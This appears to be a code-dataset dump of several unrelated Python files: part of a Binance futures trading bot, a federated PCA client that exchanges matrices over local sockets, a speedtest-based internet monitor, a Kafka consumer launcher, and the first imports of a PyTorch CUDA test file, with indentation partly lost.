if len(indicator_dict) > 0:
indicator_string = '|EMA:{:.2f}--{:.2f}--{:.2f}|MACDdiff:{:.2f}|EMV:{:.2f}|'.format(
indicator_dict['EMA_dict']['ema1'][-1],
indicator_dict['EMA_dict']['ema2'][-1],
indicator_dict['EMA_dict']['ema3'][-1],
indicator_dict['MACD_dict']['macd'][-1] - indicator_dict['MACD_dict']['macdsignal'][-1],
indicator_dict['EMV_list'][-1]
)
else:
indicator_string = ""
print('\r' + kling_string + recommendation_string + indicator_string, end="")
try:
# time.sleep(1)
# if self.depth_object!= None:
# bids_string = '{}'.format([order.price for order in self.depth_object.bids[-10:]])
# asks_string = '{}'.format([order.price for order in self.depth_object.asks[-10:]])
# margin = '========================================================================='
# print('\n\n\n{}\nRecent Market Prices:\n{}\n\nTop bids:\n{}\n\nTop asks:\n{}\n{}\n\n\n'.format(margin, price_string, bids_string, asks_string, margin))
current_time = current_utc_time()*1000
# server_status = self.client.get_system_status()
current_candlestick_data_time = int(self.__latest_data_update_timestamp)
current_depth_data_time = int(self.__latest_depth_update_timestamp)
candlestick_data_time_diff_in_seconds = (current_time - current_candlestick_data_time)/1000
depth_data_time_diff_in_seconds = (current_time - current_depth_data_time)/1000
# if server_status['status'] == 1:
# print('> > > > > > > > > > > > > > System maintenance. < < < < < < < < < < < < < < < <')
if ((candlestick_data_time_diff_in_seconds > 2) and (current_time != (candlestick_data_time_diff_in_seconds*1000))):
print("Candlestick data fetching was down for: {:.3f}s".format(candlestick_data_time_diff_in_seconds))
if ((depth_data_time_diff_in_seconds > 2) and (current_time!=(depth_data_time_diff_in_seconds*1000))):
print("Depth data fetching was down for: {:.3f}s".format(depth_data_time_diff_in_seconds))
except Exception as e:
log = "\n\n{}\nAn ERROR happend while monitoring services: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_handler(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
has_key was removed in Python 3:
https://stackoverflow.com/questions/33727149/dict-object-has-no-attribute-has-key?answertab=votes#tab-top
https://docs.python.org/3.0/whatsnew/3.0.html#builtins
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'comission': 999,
'relatedOrderID': {}
}
Order status (status):
NEW
PARTIALLY_FILLED
FILLED
CANCELED
REJECTED
EXPIRED
'''
while True:
try:
if len(self.order_update_list) > 0:
first_order = self.order_update_list.pop(0)
clientOrderId = first_order.clientOrderId
if len(clientOrderId) >= 13:
prefix_id = clientOrderId[:13]
else:
prefix_id = clientOrderId
if (prefix_id in self.current_position_dict):
print("\n====================================================================\nReceived a bot order:")
PrintMix.print_data(first_order)
put_to_log('\n\nBot order: {}\n{}\n'.format(current_date_time(), convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================")
positionSide = first_order.positionSide.lower()
orderPosition = first_order.side.lower()
orderStatus = first_order.orderStatus.lower()
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
if ((positionSide == 'long' and orderPosition == 'buy') or (positionSide == 'short' and orderPosition == 'sell')):
if (orderStatus == 'PARTIALLY_FILLED'.lower() or orderStatus == 'FILLED'.lower()):
if orderStatus == 'PARTIALLY_FILLED'.lower():
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderId, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the unfilled order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderId,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
self.current_position_dict[prefix_id]['entryPrice'] = first_order.avgPrice
self.current_position_dict[prefix_id]['quantity'] = first_order.cumulativeFilledQty
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
#TODO: sell order: place the take-profit / stop-loss exits (a worked numeric example of these stop prices follows after this handler)
correspondingTargetProfitRatio = self.target_profit_dict['level' + str(self.current_position_dict[prefix_id]['level'])]
if positionSide.lower() == 'long':
TP_stopPrice = round( ( first_order.avgPrice * (1+ (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1-(self.__stop_loss_ratio)/self.__leverage) ),2)
elif positionSide.lower() == 'short':
TP_stopPrice = round( ( first_order.avgPrice * (1 - (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1 + (self.__stop_loss_ratio)/self.__leverage) ),2)
quantity =round((first_order.avgPrice*first_order.lastFilledQty),3)
orderSide = (OrderSide.BUY if positionSide.lower() == "short" else OrderSide.SELL)
time.sleep(1)
# Take profit order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=orderSide,
type=OrderType.TAKE_PROFIT,
positionSide=positionSide.upper(),
# closePosition=True,
quantity =quantity,
stopPrice = TP_stopPrice,
price = TP_stopPrice,
newClientOrderId= prefix_id + orderSide + "_" + positionSide.upper() + "_TP",
)
# Stop loss order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=orderSide,
type=OrderType.STOP_MARKET,
positionSide=positionSide.upper(),
closePosition=True,
quantity =quantity,
stopPrice = SM_stopPrice,
newClientOrderId= prefix_id + orderSide + "_" + positionSide.upper() + "_SM",
)
elif ((positionSide == 'long' and orderPosition == 'sell') or (positionSide == 'short' and orderPosition == 'buy')):
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
if orderStatus == 'FILLED'.lower():
TP = clientOrderId[:-2] + "TP"
SM = clientOrderId[:-2] + "SM"
clientOrderID_not_filled = TP if clientOrderId[-2:] == "SM" else SM
originalSpend = self.current_position_dict[prefix_id]['entryPrice'] * self.current_position_dict[prefix_id]['quantity']
TP_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][TP].cumulativeFilledQty
TP_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][TP].avgPrice
TP_total = TP_quantity * TP_average_price
SM_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][SM].cumulativeFilledQty
SM_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][SM].avgPrice
SM_total = SM_quantity * SM_average_price
totalSold = TP_total + SM_total
if positionSide.lower() == 'short':
profit = (originalSpend - totalSold - self.current_position_dict[prefix_id]['comission'])
else:
profit = (totalSold - originalSpend - self.current_position_dict[prefix_id]['comission'])
self.__starting_asset_value += profit
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderID_not_filled, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderID_not_filled,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
log_string = '\n\n{}\nPNL for this order:\nclientOrderId: {}\npositionSide: {}\nLevel: {}\nentryPrice: {}\nexitPrice: {}\noriginalSpend: {}\ntotalSold: {}\nTakeProfitAmount: {}\n TakeProfitQuantity: {}\n TakeProfitPrice: {}\nStopLossAmount: {}\n StopLossQuantity: {}\n StopLossPrice: {}\nComission: {}\nProfit: {}\nStart Datetime: {}\nFinished Datetime: {}\n{}'.format(
self.margin,
prefix_id,
positionSide.upper(),
self.current_position_dict[prefix_id]['level'],
self.current_position_dict[prefix_id]['entryPrice'],
((TP_total + SM_total)/(TP_quantity + SM_quantity)),
originalSpend,
totalSold,
TP_total, TP_quantity, TP_average_price,
SM_total, SM_quantity, SM_average_price,
self.current_position_dict[prefix_id]['comission'],
profit,
utc_2_datetime(int(prefix_id)/1000),
current_date_time(),
self.margin)
put_to_log(log_string, self.__profit_log_path)
print(log_string)
elif orderStatus == 'CANCELED'.lower():
del self.current_position_dict[prefix_id]
else:
print("\n====================================================================\nReceived an user order:")
PrintMix.print_data(first_order)
put_to_log('\n\nUser order:\n{}\n'.format(convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================\n")
except Exception as e:
log = "\n\n{}\nAn ERROR happend in position handler function: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
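# --- Illustrative worked example (not part of the original strategy) ---
# The exit prices placed in position_handler() above follow
#     TP = entry * (1 +/- (target_profit + commission_rate) / leverage)
#     SL = entry * (1 -/+ stop_loss_ratio / leverage)
# ("+ then -" for a long entry, "- then +" for a short). With made-up numbers --
# a long filled at 100.00, target_profit 0.01 (1%), the module's commission rate
# of 0.0008, leverage 10 and stop_loss_ratio 0.5 -- this gives
#     TP = 100.00 * (1 + (0.01 + 0.0008) / 10) = 100.108 (rounded to 100.11 by the code)
#     SL = 100.00 * (1 - 0.5 / 10)             = 95.00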
def position_status_handler(self):
'''
NEW
PARTIALLY_FILLED (partially filled)
FILLED (filled)
CANCELED (canceled)
CALCULATED
EXPIRED (order expired)
TRADE (trade)
'''
while True:
try:
time.sleep(5)
for clientID in self.current_position_dict.keys():
clientOrderID = clientID[:13] + (OrderSide.BUY if self.current_position_dict[clientID]['positionSide'].lower() == 'long' else OrderSide.SELL) + "_" + self.current_position_dict[clientID]['positionSide'].upper() + "_LIMIT"
if ( ( ( int(time.time())*1000 - int(clientID[:13] ) ) > (self.__order_timeout * 6 )) and ( self.current_position_dict[clientID]['entryPrice'] != None ) ):
for orderID in self.current_position_dict[clientID]['relatedOrderID'].keys():
if orderID != clientOrderID:
try:
orderDetail = self.client.futures_get_order(origClientOrderId = orderID, symbol = self.__paried_symbol)
orderDetail['orderStatus'] = orderDetail['status']
orderDetail['cumulativeFilledQty'] = float(orderDetail['executedQty'])
orderDetail['commissionAmount'] = (float(orderDetail['avgPrice']) * float(orderDetail['executedQty'])*0.0004)
orderDetail['lastFilledQty'] = float(orderDetail['executedQty'])
orderDetail['avgPrice'] = float(orderDetail['avgPrice'])
orderDetail = dict2obj(orderDetail)
time.sleep(0.5)
if ( (orderDetail.status.lower() == 'filled') and ( ( orderDetail.type.upper() == 'STOP_MARKET') or ( orderDetail.type.upper() == 'LIMIT') ) ):
time.sleep(1)
if (clientID in self.current_position_dict):
if (self.current_position_dict[clientID]['entryPrice'] != None):
self.order_update_list.append(orderDetail)
time.sleep(3)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while fetching order status: orderID: {} ERROR({}) at {}\n{}\n\n".format(self.margin,
orderID,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while handling/updating position status: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def order_handler(self):
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
        self.current_position_dict = {
            'uniqueOrderId': {
                'uniqueOrderId': None,
                'level': 1, 2, or 3,
                'positionSide': 'SIDE',
                'trigeredPrice': -99999,
                'entryPrice': -99999,
                'exitPrice': -99999,
                'quantity': 0,
                'relatedOrderID': {},
                'comission': 999
            }
        }
'''
while True:
try:
for clientID in self.current_position_dict.keys():
clientOrderID = clientID[:13] + (OrderSide.BUY if self.current_position_dict[clientID]['positionSide'].lower() == 'long' else OrderSide.SELL) + "_" + self.current_position_dict[clientID]['positionSide'].upper() + "_LIMIT"
if ( ( ( int(time.time())*1000 - int(clientID[:13] ) ) > self.__order_timeout) and ( self.current_position_dict[clientID]['entryPrice'] == None ) ):
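                        # Entry limit order not filled within __order_timeout: cancel it, then fetch its final status in case it filled in the meantime.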
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderID, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the timeout order: orderID:{}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientID,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
try:
result = self.client.futures_get_order(origClientOrderId = clientOrderID, symbol = self.__paried_symbol)
result['orderStatus'] = result['status']
result['cumulativeFilledQty'] = float(result['executedQty'])
result['commissionAmount'] = (float(result['avgPrice']) * float(result['executedQty'])*0.0004)
result['lastFilledQty'] = float(result['executedQty'])
result['avgPrice'] = float(result['avgPrice'])
result = dict2obj(result)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting information for the timeout order: orderID:{}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientID,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
time.sleep(2)
if (result.status.lower() == 'filled') and (self.current_position_dict[clientID]['entryPrice'] == None):
self.order_update_list.append(result)
# else:
# del self.current_position_dict[clientID]
time.sleep(2)
else:
del self.current_position_dict[clientID]
print("\n\nTimeout order: {} was successfully canceled.".format(clientID))
continue
if ( ( ( self.__acc_profit + self.__starting_asset_value) < 8) and ( len(self.current_position_dict) == 0 ) ):
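                        # Balance guard (threshold 8, quote-asset units assumed): do not open new positions, just wait and re-check.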
print('\n\nNot enough balance: {}\n\n'.format( self.__acc_profit + self.__starting_asset_value))
time.sleep(5)
elif len(self.current_position_dict) <2:
recom = self.current_recommendation.copy()
if len(self.current_position_dict) == 1:
# pass
# Uncomment the following if both long and short can exist
current_position_OrderId = list(self.current_position_dict.keys())[0]
current_position_side = self.current_position_dict[current_position_OrderId]['positionSide']
opoPositionSide = (PositionSide.SHORT if current_position_side.upper() == PositionSide.LONG else PositionSide.LONG)
if recom[opoPositionSide.lower()]['level'] > 0:
rec_price = recom[opoPositionSide.lower()]['price']
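                            # Order size = (account value * leverage) / price, rounded to 3 decimals (assumed contract quantity precision).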
quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
positionSide = opoPositionSide.lower()
level = recom[positionSide]['level']
uniqueOrderId = str(int(current_utc_time()*1000))
self.place_limit_buy(positionSide, level, quantity, rec_price, uniqueOrderId)
elif len(self.current_position_dict) == 0:
if (recom['short']['level'] > 0 or recom['long']['level'] > 0):
if recom['short']['level'] > 0:
posisionSide = 'short'
elif recom['long']['level'] > 0:
posisionSide = 'long'
if (posisionSide == 'long' or posisionSide == 'short'):
rec_price = recom[posisionSide.lower()]['price']
quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
level = recom[posisionSide.lower()]['level']
uniqueOrderId = str(int(current_utc_time()*1000))
self.place_limit_buy(posisionSide, level, quantity, rec_price, uniqueOrderId)
time.sleep(1)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while handling an order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def place_limit_buy(self, positionSide, level, quantity, price, uniqueOrderId):
try:
self.current_position_dict[uniqueOrderId] = {
'uniqueOrderId': uniqueOrderId,
'level': level,
'positionSide': positionSide,
'trigeredPrice': price,
'entryPrice': None,
'exitPrice': None,
'quantity': 0,
'relatedOrderID': {},
'comission': 0
}
orderSide = (OrderSide.BUY if positionSide.lower() == "long" else OrderSide.SELL)
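            # The limit price is shifted by __price_anneal past the recommended price (up for longs, down for shorts), presumably to make the entry order fill quickly.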
self.client.futures_create_order(symbol = self.__paried_symbol,
side=orderSide,
type=OrderType.LIMIT,
positionSide=positionSide.upper(),
timeInForce = TimeInForce.GTC,
quantity =quantity,
price = round((price * ( (1 + self.__price_anneal) if positionSide.lower() == "long" else ( 1 - self.__price_anneal ) ) ), 2),
# Test price: not for filled
# price = round((price * (0.8 if positionSide.lower() == "long" else 1.2)), 2),
newClientOrderId=uniqueOrderId + orderSide + "_" + positionSide.upper() + "_LIMIT"
)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while placing a limit order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
del self.current_position_dict[uniqueOrderId]
def cancele_order(self, clientOrderId):
pass
def run(self):
'''
https://www.itranslater.com/qa/details/2583623258847314944
'''
pre_task_finished = self.make_dir()
if pre_task_finished:
self.update_config_info()
t1 = threading.Thread(target=self.start_subscribing)
t2 = threading.Thread(target=self.start_analysing)
t3 = threading.Thread(target=self.start_handler)
t4 = threading.Thread(target=self.check_if_service_avaliable)
task_list = [t1, t2, t3, t4]
for task in task_list:
task.start()
for task in task_list:
task.join()
|
clientPCA.py
|
import threading  # Used to manage multiple threads per process
import time  # Used to sleep the main thread
import random
import socket  # Used for inter-process communication
import struct  # Used to handle bytes as packed/unpacked data
import numpy as np  # Used to handle the matrices
import re  # Used to handle regular expressions
import ast  # Used for Abstract Syntax Trees (literal_eval)
import sys
from pandas import read_csv, DataFrame  # Read CSVs
from federatedPCA import SAPCA,privateSAPCA,merge  # Algorithms implemented following the paper
from sklearn.preprocessing import scale
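# Protocol sketch (as read from the code below): every node first computes a local
# (optionally differentially private) SAPCA estimate of U, S and the rank r. It then
# loops as a "leader": it multicasts a UDP invitation carrying its TCP port, accepts a
# TCP connection from one participant, receives that participant's estimates encoded as
# "np.array_str(U)/np.array_str(S)/r", and merges them into its own. If no participant
# answers before the timeout, the node temporarily becomes a participant itself and
# pushes its estimates to whichever leader invites it.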
def str2array(s):
# Remove space after [
s=re.sub('\[ +', '[', s.strip())
# Replace commas and spaces
s=re.sub('[,\s]+', ', ', s)
return np.array(ast.literal_eval(s))
def send(data, port=5007, addr='224.1.1.1'):
"""send(data[, port[, addr]]) - multicasts a UDP datagram."""
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Make the socket multicast-aware, and set TTL.
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
# Send the data
s.sendto(data, (addr, port))
def recv(port=5007, addr="224.1.1.1", buf_size=1024):
"""recv([port[, addr[,buf_size]]]) - waits for a datagram and returns the data."""
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,socket.IPPROTO_UDP)
# Set some options to make it multicast-friendly
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except AttributeError:
pass # Some systems don't support SO_REUSEPORT
s.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 20)
s.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
s.settimeout(random.randint(4,8))
# Bind to the port
s.bind(('', port))
mreq = struct.pack("4sl", socket.inet_aton(addr), socket.INADDR_ANY)
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# Receive the data, then unregister multicast receive membership, then close the port
data,send_addr = s.recvfrom(buf_size)
s.setsockopt(socket.SOL_IP, socket.IP_DROP_MEMBERSHIP, socket.inet_aton(addr) + socket.inet_aton('0.0.0.0'))
s.close()
return data
def Participante(currentU,currentS,currentR,q):
    # Flag indicating whether this process has already been a participant at some point.
    # If it has, execution stops.
    yaFuiParticipante = False
    print("I am a participant")
    while soyParticipante:
        try:
            invitacion=recv()
            puertoDeMiLider=int(invitacion.split()[1])
            # An invitation arrived from another leader.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Open the connection to transmit the current estimates.
            s.connect((TCP_IP, puertoDeMiLider))
            cadAEnviar=np.array_str(currentU)+"/"+np.array_str(currentS)+"/"+str(currentR)
            # Send the encoded message
            s.send(cadAEnviar)
            #s.close()
            # End the communication and set the flag to True.
            yaFuiParticipante = True
            break
        except socket.timeout:
            continue
        except Exception as e:
            print("Participation exception", e)
    q.append(yaFuiParticipante)
    return
np.set_printoptions(threshold=sys.maxsize)
soyParticipante = False
TCP_IP = '127.0.0.1'  # Local IP address for inter-process communication via TCP and UDP
BUFFER_SIZE = 1024  # Size of the communication buffer
private=True  # Flag selecting whether to use SAPCA or private SAPCA
b=11
epsilon=4
delta=.4
alfa=.1
beta=.2
currentR=5  # Initial estimate of the rank
dataSetName='wine'
i=raw_input()
data = read_csv('./datasets/'+dataSetName+i+'.csv')  # Read this node's partial share of the dataset
data = DataFrame(scale(data), index=data.index, columns=data.columns)
XMat = data.rename_axis('ID').values  # Convert the data into a matrix.
XMat=XMat.T  # Transpose the matrix to be consistent with the paper.
if private:
    currentR,currentU,currentS=privateSAPCA(currentR,XMat,b,alfa,beta,epsilon,delta)  # Compute the principal directions with the available data
else:
    currentR,currentU,currentS=SAPCA(currentR,XMat,b,alfa,beta)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # Create a socket for client-to-client communication
s.bind((TCP_IP, 0))
puertoLider = s.getsockname()[1]  # Store the socket's port for multicast communication
s.settimeout(2)  # Time during which the process will try to act as leader.
# After this time the process sleeps and switches to participant mode.
while 1:
    # Save the current estimates of U and S
    if private:
        np.save('currentUPrivate'+dataSetName, currentU)
        np.save('currentSPrivate'+dataSetName, currentS)
    else:
        np.save('currentU'+dataSetName, currentU)
        np.save('currentS'+dataSetName, currentS)
    print("I am the leader")
    time.sleep(1)
    send("lider "+str(puertoLider))  # Send an invitation to all participants.
    try:
        s.listen(1)
        conn, addr = s.accept()
        # If a connection is received it means a participant will send its current
        # estimates of U and S, so a merge will be performed.
        mensajeReconstruido = ""
        while 1:
            time.sleep(.1)
            data = conn.recv(BUFFER_SIZE)
            if not data: break
            mensajeReconstruido+=data
        time.sleep(.5)  # sleep before closing the connection to avoid broken pipes
        conn.close()  # close the connection
        # Decode the matrices contained in the message
        matrices = mensajeReconstruido.split('/')
        incomingU=str2array(matrices[0])
        incomingS=str2array(matrices[1])
        incomingR=int(matrices[2])
        # Merge with the incoming matrices.
        currentU,currentS=merge(max(currentR,incomingR),currentU,currentS,incomingU,incomingS)
        currentR = max(incomingR,currentR)
    except socket.timeout:
        # If no responses were received the thread switches to participant mode.
        soyParticipante=True
        q=list()
        thread1 = threading.Thread(target = Participante, args = (currentU,currentS,currentR, q))
        thread1.start()
        # Sleep a random amount of time to avoid deadlocks.
        time.sleep(random.randint(5,10))
        soyParticipante=False
        # If the thread is still sending something, let the transfer finish before resuming
        # in leader mode.
        while(thread1.isAlive()):
            time.sleep(1)
        if q.pop():
            break
    except Exception as e:
        print("Leader exception",e)
|
core.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
# HTTP / HTML
import tornado
import tornado.wsgi
import tornado.httpserver
# Intercheck
from . import utils
from . import routes
# Python built-in
import webbrowser
import threading
import logging
import httplib
import socket
import time
import os
# Configure the logger
print = logging.warning
utils.configure_logging()
# Get a handle on the APP
APP = routes.APP
def background(settings_filepath, min_interval_connected=60.0,
min_interval_disconnected=30.0, force_check_interval=1,
debug=True):
duration_run_avg = None
while True:
# Load settings
settings_dict = utils.load_settings(quiet=True)
interval = settings_dict.get('interval')
interval_exact = settings_dict.get('interval_exact')
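        # 'interval' is the number of seconds between checks; 'interval_exact' (used further down) snaps the next check to the nearest minute boundary while connected.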
# Check the interval to make sure it is reasonable
if interval < min_interval_connected:
print('Warning, interval less than 1 minute (minimum interval)')
interval = max(min_interval_connected, interval)
if interval < duration_run_avg:
print('Warning, interval less than average duration')
# Run SpeedTest
APP.status.discard('waiting')
APP.status.add('testing')
result_dict = speedtest()
APP.status.discard('testing')
APP.status.add('waiting')
# Check for success
success = result_dict.get('success')
if success:
APP.status.discard('disconnected')
APP.status.add('connected')
else:
APP.status.discard('connected')
APP.status.add('disconnected')
interval = min_interval_disconnected
# Get duration and update running average
duration = result_dict.get('duration')
if duration_run_avg is None:
duration_run_avg = duration
else:
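            # Running average with equal weight on the previous average and the latest measurement.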
duration_run_avg = (duration_run_avg + duration) * 0.5
# Calculate the timeout
timeout = max(0, interval - duration)
current = time.time()
future = current + timeout
# Correct for Intercheck overhead, round timeout to the nearest minute
offset = 0.0
if interval_exact:
near_interval = 60.0 if success else min_interval_disconnected
nearest = round(future / near_interval) * near_interval
offset = nearest - future
# Correct timeout and future
timeout += offset
future += offset
# Output results of the SpeedTest
time_str = time.strftime('%D %H:%M:%S', time.localtime(future))
if debug:
args = (interval, offset, duration_run_avg, )
additional = ' (interval %0.2f, offset %0.2f, avg. %0.3f)' % args
else:
additional = ''
args = (timeout, time_str, additional)
print('Waiting for next check in %0.2f sec. at %s%s' % args)
# Sleep for the timeout duration, checking for the force file
while timeout > 0:
timeout_small = min(force_check_interval, timeout)
timeout -= timeout_small
if utils.check_force():
print('Forcing...')
break
time.sleep(timeout_small)
def start_background(settings_filepath):
if hasattr(APP, 'background_thread') and APP.background_thread is not None:
print('Cannot start the background process, already running')
return
args = [settings_filepath]
APP.background_thread = threading.Thread(target=background, args=args)
APP.background_thread.setDaemon(True)
APP.background_thread.start()
APP.background_thread.join(0)
def speedtest(verbose=True):
# Ensure we have the speedtest-cli to use
find_speedtest(quiet=True)
# Start the SpeedTest
if verbose:
print('Performing SpeedTest...')
start, duration, ping, download, upload = None, None, None, None, None
with utils.Timer() as timer:
try:
with os.popen(' '.join([APP.server_cli, '--simple'])) as response:
for line in response:
line = line.strip().split()
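                        # 'speedtest-cli --simple' prints lines such as 'Ping: 23.456 ms'; splitting yields [label, value, unit].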
if len(line) == 3:
try:
key, value = line[:2]
value = float(value)
if key.startswith('Ping'):
ping = value
if key.startswith('Download'):
download = value
if key.startswith('Upload'):
upload = value
except IndexError:
pass
except ValueError:
pass
except httplib.BadStatusLine:
pass
except Exception as unexpected:
print('\n\nCAUGHT UNEXPECTED EXCEPTION: %r\n\n' % (unexpected, ))
pass
# Compile the results, possibly print
start = timer.start
duration = timer.duration
if verbose:
ping_str = 'ERROR\t\t' if ping is None else '%0.03f ms' % (ping, ) # NOQA
download_str = 'ERROR\t\t' if download is None else '%0.03f Mb/s' % (download, ) # NOQA
upload_str = 'ERROR' if upload is None else '%0.03f Mb/s' % (upload, ) # NOQA
message = '\tPing: %s\tDownload: %s\tUpload: %s'
args = (ping_str, download_str, upload_str, )
print(message % args)
message = '\tDuration: %0.03f sec.\tPerformed: %s'
time_str = time.strftime('%D %H:%M:%S', time.localtime(start))
args = (duration, time_str, )
print(message % args)
print('...done')
# Create results dict
# Yay, DeMorgan
failure = ping is None or download is None or upload is None
result_dict = {
'start' : start,
'duration' : duration,
'ping' : ping,
'download' : download,
'upload' : upload,
'success' : not failure,
}
# Write results to log(s)
utils.write_to_logs(**result_dict)
return result_dict
def find_speedtest(command='speedtest-cli', quiet=False):
# Check to see if speedtest-cli has already been found
if hasattr(APP, 'server_cli') and APP.server_cli is not None:
if not quiet:
print('Cached %s (%s)' % (command, APP.server_cli, ))
return
# Find speedtest-cli using bash 'which'
with os.popen(' '.join(['which', command])) as response:
for line in response:
line = line.strip()
if len(line) > 0 and line.endswith(command):
APP.server_cli = os.path.abspath(line)
print('Found %s (%s)' % (command, APP.server_cli, ))
break # Gaurantee only first line is processed
else:
message = 'Command line interface %r cannot be found, ' + \
'install using \'pip install speedtest-cli\''
raise RuntimeError(message % (command, ))
def start(**kwargs):
# Configure the command line argument parser
cl_settings_dict = utils.configure_argparser()
# Load last settings from disk, if first time load default settings in utils
settings_dict = utils.load_settings(quiet=True)
# Update settings with command line argument settings
settings_dict.update(cl_settings_dict)
# Update settings with instance-specific settings
settings_dict.update(kwargs)
# Save settings
utils.save_settings(settings_dict, quiet=False)
# Determine the IP address
try:
APP.server_ip_address = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
APP.server_ip_address = '127.0.0.1'
APP.server_port = settings_dict.get('port')
# Initialize the web handler
try:
wsgi_container = tornado.wsgi.WSGIContainer(APP)
http_server = tornado.httpserver.HTTPServer(wsgi_container)
http_server.listen(APP.server_port)
except socket.error:
args = (APP.server_port, )
print('Cannot start Intercheck on port %d, already in use' % args)
return
# Determine the URL for this server
url = 'http://%s:%s' % (APP.server_ip_address, APP.server_port)
print('Intercheck starting at %s' % (url,))
# Open URL in default browser
print('Opening Intercheck using system\'s default browser')
webbrowser.open(url)
# Start the IO loop, blocking
start_background('')
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
start()
|
app.py
|
#!/bin/python
import logging
from multiprocessing import Process
from models.metric_manager import MetricManager
from kafkawrapper.consumer import consume
log = logging.getLogger('file')
# Starts the kafka consumer in a separate process
def start_consumer():
# with ulca_dataset_validate.test_request_context():
try:
consumer_process = Process(target=consume)
consumer_process.start()
except Exception as e:
log.exception(f'Exception while starting the ULCA Model Metric Eval kafka consumer: {str(e)}')
if __name__ == '__main__':
metric_mgr = MetricManager.getInstance()
metric_mgr.load_metrics()
start_consumer()
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
